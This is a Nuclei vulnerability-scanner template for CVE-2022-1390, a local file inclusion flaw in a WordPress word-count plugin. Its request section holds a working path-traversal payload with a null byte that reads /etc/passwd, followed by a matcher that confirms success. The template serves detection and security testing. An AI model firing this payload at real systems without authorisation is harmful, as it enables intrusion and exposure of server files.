nuclei-templates/http/cves/2022/CVE-2022-1390.yaml

47 lines
1.9 KiB
YAML

id: CVE-2022-1390
info:
name: WordPress Admin Word Count Column 2.2 - Local File Inclusion
author: daffainfo,Splint3r7
severity: critical
description: |
The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
remediation: |
Update to the latest version of the WordPress Admin Word Count Column plugin (2.2 or higher) to fix the local file inclusion vulnerability.
reference:
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/
- https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
- https://nvd.nist.gov/vuln/detail/CVE-2022-1390
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1390
cwe-id: CWE-22
epss-score: 0.96836
epss-percentile: 0.99577
cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: admin_word_count_column_project
product: admin_word_count_column
framework: wordpress
tags: packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100a0e4c41d6f2537c07d5f3f7dac94df0679fecbf7d078aa299f76ba5bfb284b00022030d1c0f7a7d840299296f27bc774c05a5568ef111b779e66a15b0c794f23e8f9:922c64590222798bb761d5b6d8e72950